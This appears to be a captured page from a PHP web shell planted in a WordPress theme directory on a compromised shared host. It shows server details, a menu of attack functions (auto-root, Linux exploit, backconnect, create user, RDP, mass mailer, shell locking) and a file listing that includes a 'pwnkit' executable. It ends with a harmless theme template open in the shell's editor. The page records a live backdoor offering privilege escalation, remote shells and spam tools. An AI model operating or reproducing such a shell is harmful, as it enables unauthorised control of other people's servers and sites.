Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
formation /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.63
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
3.35
KB
-rw-r--r--
comments.php
3.15
KB
-rw-r--r--
content-aside.php
1.51
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
637
B
-rw-r--r--
content-single.php
2.28
KB
-rw-r--r--
content.php
2.58
KB
-rw-r--r--
custom-css.js
807
B
-rw-r--r--
footer.php
2.29
KB
-rw-r--r--
functions.php
18.99
KB
-rw-r--r--
functionsbak.php
18.5
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
image.php
5.36
KB
-rw-r--r--
index.php
1.91
KB
-rw-r--r--
license.txt
14.96
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.15
KB
-rw-r--r--
page.php
1.03
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.69
KB
-rw-r--r--
rtl.css
47.04
KB
-rw-r--r--
screenshot.png
777.66
KB
-rw-r--r--
search.php
1.11
KB
-rw-r--r--
searchform.php
637
B
-rw-r--r--
sidebar.php
1.08
KB
-rw-r--r--
single.php
1.04
KB
-rw-r--r--
style.css
47.04
KB
-rw-r--r--
wpml-config.xml
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-aside.php
<?php /** * The template for displaying posts in the Aside post format * @package formation * @since formation 1.0 */ ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <header class="entry-header"> <h1 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php echo esc_attr( sprintf( __( 'Permalink to %s', 'formation' ), the_title_attribute( 'echo=0' ) ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h1> </header><!-- .entry-header --> <div class="entry-content"> <?php the_content( __( 'Continue reading <span class="meta-nav">→</span>', 'formation' ) ); ?> <?php wp_link_pages( array( 'before' => '<div class="page-links">' . __( 'Pages:', 'formation' ), 'after' => '</div>' ) ); ?> </div><!-- .entry-content --> <footer class="entry-meta"> <a href="<?php the_permalink(); ?>" title="<?php echo esc_attr( sprintf( __( 'Permalink to %s', 'formation' ), the_title_attribute( 'echo=0' ) ) ); ?>" rel="bookmark"><?php echo get_the_date(); ?></a> <?php if ( ! post_password_required() && ( comments_open() || '0' != get_comments_number() ) ) : ?> <span class="sep"> | </span> <span class="comments-link"><?php comments_popup_link( __( 'Leave a comment', 'formation' ), __( '1 Comment', 'formation' ), __( '% Comments', 'formation' ) ); ?></span> <?php endif; ?> <?php edit_post_link( __( 'Edit', 'formation' ), '<span class="sep"> | </span><span class="edit-link">', '</span>' ); ?> </footer><!-- .entry-meta --> </article><!-- #post-<?php the_ID(); ?> -->
Close